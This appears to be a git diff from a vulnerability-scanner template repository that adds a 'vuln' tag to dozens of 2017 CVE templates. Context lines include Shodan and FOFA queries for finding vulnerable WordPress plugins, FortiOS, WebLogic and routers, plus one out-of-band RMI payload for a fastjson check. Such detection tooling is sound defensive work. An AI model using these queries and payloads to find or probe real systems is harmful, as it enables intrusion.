b/http/cves/2017/CVE-2017-16894.yaml index 89590047835..cca98973ae0 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -36,7 +36,7 @@ info: fofa-query: - app="Laravel-Framework" - app="laravel-framework" - tags: cve,cve2017,laravel,exposure,packetstorm,vkev + tags: cve,cve2017,laravel,exposure,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 94964db44d0..97ca58d229f 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -28,7 +28,7 @@ info: vendor: zitec product: "emag_marketplace_connector" framework: wordpress - tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec + tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index a14bac72ec8..0e785a64b09 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -27,7 +27,7 @@ info: vendor: "amtythumb_project" product: amtythumb framework: wordpress - tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project + tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 244cf5015ba..c9b9f913e06 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -28,7 +28,7 @@ info: vendor: wpmailster product: "wp_mailster" framework: wordpress - tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster + tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index f339eabffac..e3cc5211b6a 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -29,7 +29,7 @@ info: vendor: embedthis product: goahead shodan-query: cpe:"cpe:2.3:a:embedthis:goahead" - tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis,vkev + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 1155a06f544..633e97a5195 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -36,7 +36,7 @@ info: - app="DedeCMS" - app="dedecms" - body="dedecms" - tags: cve,cve2017,sqli,dedecms,vkev + tags: cve,cve2017,sqli,dedecms,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index ccc0f94de78..22f5448ddf1 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -34,7 +34,7 @@ info: - http.title:"kentico database setup" fofa-query: title="kentico database setup" google-query: intitle:"kentico database setup" - tags: cve2017,cve,kentico,cms,install,unauth,edb + tags: cve2017,cve,kentico,cms,install,unauth,edb,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index f8292685418..f7cc2bb1f16 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"avantfax - login" fofa-query: title="avantfax - login" google-query: intitle:"avantfax - login" - tags: cve,cve2017,avantfax,hackerone,packetstorm,xss + tags: cve,cve2017,avantfax,hackerone,packetstorm,xss,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18349.yaml b/http/cves/2017/CVE-2017-18349.yaml index 4910a6e4f84..94313fee997 100644 --- a/http/cves/2017/CVE-2017-18349.yaml +++ b/http/cves/2017/CVE-2017-18349.yaml @@ -29,7 +29,7 @@ info: verified: true vendor: alibaba product: fastjson - tags: cve,cve2017,fastjson,deserialization,rce,oob,oast,vkev + tags: cve,cve2017,fastjson,deserialization,rce,oob,oast,vkev,vuln variables: rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}" diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index aa2b6d9557b..56ef742739b 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/adsense-plugin/ fofa-query: body=/wp-content/plugins/adsense-plugin/ publicwww-query: "/wp-content/plugins/adsense-plugin/" - tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project + tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 02d67eabfe9..b91182c6fbb 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/contact-form-multi/ fofa-query: body=/wp-content/plugins/contact-form-multi/ publicwww-query: "/wp-content/plugins/contact-form-multi/" - tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft + tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index beeaae666b1..a3071b1bef5 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ fofa-query: body=/wp-content/plugins/contact-form-plugin/ publicwww-query: "/wp-content/plugins/contact-form-plugin/" - tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 14ebe61e5d8..bbe74b240f7 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/contact-form-to-db/ fofa-query: body=/wp-content/plugins/contact-form-to-db/ publicwww-query: "/wp-content/plugins/contact-form-to-db/" - tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 4115e149ecc..b66ca4ea5fe 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/custom-admin-page/ fofa-query: body=/wp-content/plugins/custom-admin-page/ publicwww-query: "/wp-content/plugins/custom-admin-page/" - tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index f7f7754f19d..93175d7de11 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/custom-search-plugin/ fofa-query: body=/wp-content/plugins/custom-search-plugin/ publicwww-query: "/wp-content/plugins/custom-search-plugin/" - tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 4428741206d..32e40c1f0ec 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/htaccess/ fofa-query: body=/wp-content/plugins/htaccess/ publicwww-query: "/wp-content/plugins/htaccess/" - tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index de1179b8fe3..0f0a2f4983f 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/social-buttons-pack/ fofa-query: body=/wp-content/plugins/social-buttons-pack/ publicwww-query: "/wp-content/plugins/social-buttons-pack/" - tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index d52da84bc97..de8616ba128 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/social-login-bws/ fofa-query: body=/wp-content/plugins/social-login-bws/ publicwww-query: "/wp-content/plugins/social-login-bws/" - tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 9a9356c320b..407397d140d 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/subscriber/ fofa-query: body=/wp-content/plugins/subscriber/ publicwww-query: "/wp-content/plugins/subscriber/" - tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index a9d7a8372f8..112fa219e05 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/twitter-plugin/ fofa-query: body=/wp-content/plugins/twitter-plugin/ publicwww-query: "/wp-content/plugins/twitter-plugin/" - tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index a5a78214c9d..36135ef9932 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/bws-linkedin/ fofa-query: body=/wp-content/plugins/bws-linkedin/ publicwww-query: "/wp-content/plugins/bws-linkedin/" - tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index d3e3595fdfd..f488bf4edac 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/bws-pinterest/ fofa-query: body=/wp-content/plugins/bws-pinterest/ publicwww-query: /wp-content/plugins/bws-pinterest/ - tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 3869ad6213a..9a483559b11 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/bws-smtp/ fofa-query: body=/wp-content/plugins/bws-smtp/ publicwww-query: /wp-content/plugins/bws-smtp/ - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 3b07baf37df..b03757e3d1b 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/pagination/ fofa-query: body=/wp-content/plugins/pagination/ publicwww-query: "/wp-content/plugins/pagination/" - tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index a8ad68b3d6f..6d27f600384 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/pdf-print/ fofa-query: body=/wp-content/plugins/pdf-print/ publicwww-query: "/wp-content/plugins/pdf-print/" - tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index f17b19bf884..4b6d8a2bb30 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/promobar/ fofa-query: body=/wp-content/plugins/promobar/ publicwww-query: /wp-content/plugins/promobar/ - tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index bfa6cbe4fbc..128cfc4f2e0 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/rating-bws/ fofa-query: body=/wp-content/plugins/rating-bws/ publicwww-query: "/wp-content/plugins/rating-bws/" - tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 2d8b65f65bd..0edf18e0340 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/realty/ fofa-query: body=/wp-content/plugins/realty/ publicwww-query: /wp-content/plugins/realty/ - tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 948375f3a5d..df2f8f4c101 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -27,7 +27,7 @@ info: vendor: fullworks product: stop_user_enumeration framework: wordpress - tags: cve2017,cve,wpscan,wordpress,xss,wp-plugin,fullworks + tags: cve2017,cve,wpscan,wordpress,xss,wp-plugin,fullworks,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 171916ccf77..3800e347222 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/visitors-online/ fofa-query: body=/wp-content/plugins/visitors-online/ publicwww-query: "/wp-content/plugins/visitors-online/" - tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 187406b1b59..ef01a727508 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/zendesk-help-center/ fofa-query: body=/wp-content/plugins/zendesk-help-center/ publicwww-query: "/wp-content/plugins/zendesk-help-center/" - tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 09dbc54e753..552ed199fa0 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/bws-google-analytics/ fofa-query: body=/wp-content/plugins/bws-google-analytics/ publicwww-query: "/wp-content/plugins/bws-google-analytics/" - tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index f491b829353..fa91e07da86 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/bws-google-maps/ fofa-query: body=/wp-content/plugins/bws-google-maps/ publicwww-query: "/wp-content/plugins/bws-google-maps/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 4ea20e39981..8b8e59c4901 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/bws-testimonials/ fofa-query: body=/wp-content/plugins/bws-testimonials/ publicwww-query: "/wp-content/plugins/bws-testimonials/" - tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 5d7d9ed231d..840efa214d1 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/error-log-viewer/ fofa-query: body=/wp-content/plugins/error-log-viewer/ publicwww-query: "/wp-content/plugins/error-log-viewer/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index d8e90c2908b..ede0746f9f5 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/sender/ fofa-query: body=/wp-content/plugins/sender/ publicwww-query: "/wp-content/plugins/sender/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index e387c7e8eda..54755eb85d2 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/updater/ fofa-query: body=/wp-content/plugins/updater/ publicwww-query: "/wp-content/plugins/updater/" - tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index d89f8801133..bfa10d3681a 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/user-role/ fofa-query: body=/wp-content/plugins/user-role/ publicwww-query: "/wp-content/plugins/user-role/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-18590.yaml b/http/cves/2017/CVE-2017-18590.yaml index 71b6e64cf8b..29de120959a 100644 --- a/http/cves/2017/CVE-2017-18590.yaml +++ b/http/cves/2017/CVE-2017-18590.yaml @@ -24,7 +24,7 @@ info: vendor: bestwebsoft product: timesheet framework: wordpress - tags: cve,cve2017,wordpress,wp,wp-plugin,bws-promobar,xss,authenticated,timesheet + tags: cve,cve2017,wordpress,wp,wp-plugin,bws-promobar,xss,authenticated,timesheet,vuln flow: http(1) && http(2) diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index b64d748152c..02e52a2a1ea 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -28,7 +28,7 @@ info: vendor: designmodo product: qards framework: wordpress - tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo + tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 6a6666f07bf..5ac35f6a5d6 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: graphite_project product: graphite - tags: cve,cve2017,graphite,ssrf,oast,graphite_project + tags: cve,cve2017,graphite,ssrf,oast,graphite_project,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-20194.yaml b/http/cves/2017/CVE-2017-20194.yaml index a32631903f4..e2f467d2c43 100644 --- a/http/cves/2017/CVE-2017-20194.yaml +++ b/http/cves/2017/CVE-2017-20194.yaml @@ -29,7 +29,7 @@ info: product: formidable_form_builder framework: wordpress public-query: "/wp-content/plugins/formidable/" - tags: cve,cve2017,wpscan,wordpress,wp,wp-plugin,formidable,passive,vkev + tags: cve,cve2017,wpscan,wordpress,wp,wp-plugin,formidable,passive,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-3131.yaml b/http/cves/2017/CVE-2017-3131.yaml index eec9a942255..b3beab33752 100644 --- a/http/cves/2017/CVE-2017-3131.yaml +++ b/http/cves/2017/CVE-2017-3131.yaml @@ -28,7 +28,7 @@ info: - http.html:"/remote/login" "xxxxxxxx" - http.favicon.hash:945408572 - cpe:"cpe:2.3:o:fortinet:fortios" - tags: cve,cve2017,fortinet,fortios,xss,authenticated + tags: cve,cve2017,fortinet,fortios,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-3132.yaml b/http/cves/2017/CVE-2017-3132.yaml index d8d39f1b674..a6eebf8ff3f 100644 --- a/http/cves/2017/CVE-2017-3132.yaml +++ b/http/cves/2017/CVE-2017-3132.yaml @@ -28,7 +28,7 @@ info: - http.html:"/remote/login" "xxxxxxxx" - http.favicon.hash:945408572 - cpe:"cpe:2.3:o:fortinet:fortios" - tags: cve,cve2017,fortinet,fortios,xss + tags: cve,cve2017,fortinet,fortios,xss,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-3133.yaml b/http/cves/2017/CVE-2017-3133.yaml index 211e254eb86..721e76d1508 100644 --- a/http/cves/2017/CVE-2017-3133.yaml +++ b/http/cves/2017/CVE-2017-3133.yaml @@ -28,7 +28,7 @@ info: - http.html:"/remote/login" "xxxxxxxx" - http.favicon.hash:945408572 - cpe:"cpe:2.3:o:fortinet:fortios" - tags: cve,cve2017,fortinet,fortios,xss,authenticated + tags: cve,cve2017,fortinet,fortios,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 434586442ff..ad15fd2c15f 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -31,7 +31,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle,kev,vkev + tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle,kev,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 35eb3789c7f..52b950dd80f 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: oracle product: applications_framework - tags: cve,cve2017,oracle,redirect,edb + tags: cve,cve2017,oracle,redirect,edb,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 03745312550..999cd3ee8fb 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mcafee product: network_data_loss_prevention - tags: cve,cve2017,mcafee,xss + tags: cve,cve2017,mcafee,xss,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 610bb8612d5..becc30e5910 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: netgear product: r6200_firmware - tags: cve,cve2017,auth-bypass,netgear,router,kev,vkev + tags: cve,cve2017,auth-bypass,netgear,router,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index d9f0aaba10d..23455dd8a78 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -28,7 +28,7 @@ info: vendor: kmc_information_systems product: caseaware fofa-query: title="caseaware" - tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems + tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index c5140ae68d2..479f287d5cb 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml 